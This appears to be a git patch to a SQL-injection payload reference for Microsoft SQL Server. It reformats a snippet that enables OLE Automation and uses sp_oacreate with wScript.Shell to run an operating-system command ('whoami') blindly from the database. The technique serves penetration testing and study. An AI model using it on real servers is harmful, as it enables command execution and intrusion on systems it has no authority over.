From 981a76f2fdfff6e3347438fe85e955e2d7502d51 Mon Sep 17 00:00:00 2001 From: f0rk3b0mb Date: Tue, 28 Apr 2026 11:51:38 +0300 Subject: [PATCH] added ole automation command execution --- SQL Injection/MSSQL Injection.md | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index a770988b..d010079f 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -300,26 +300,26 @@ EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open `Object Linking and Embedding (OLE)` is a technology that allows one application to link objects into another application. It was originally designed for Microsoft Office (e.g. to embed Excel sheets into Word documents) and eventually became the foundation for the Component Object Model (COM). OLE Automation enables a SQL server to interact with arbitrary COM objects. -``` -> Check current status +```sql +-- Check current status EXEC sp_configure 'Ole Automation Procedures'; -> Enable OLE Automation +-- Enable OLE Automation EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE; -> Verify it's enabled +-- Verify it's enabled EXEC sp_configure 'Ole Automation Procedures'; -> run command +-- run command -DECLARE @output INT; DECLARE @ProgramToRun VARCHAR(500); SET @ProgramToRun = 'Run("")'; EXEC sp_oacreate 'wScript.Shell', @output out; EXEC sp_oamethod @output, @ProgramToRun; EXEC sp_oadestroy @output; +DECLARE @output INT; DECLARE @ProgramToRun VARCHAR(500); SET @ProgramToRun = 'Run("whoami")'; EXEC sp_oacreate 'wScript.Shell', @output out; EXEC sp_oamethod @output, @ProgramToRun; EXEC sp_oadestroy @output; ->> NOTE that it does not print output (it is blind execution) +-- NOTE that it does not print output (it is blind execution) ```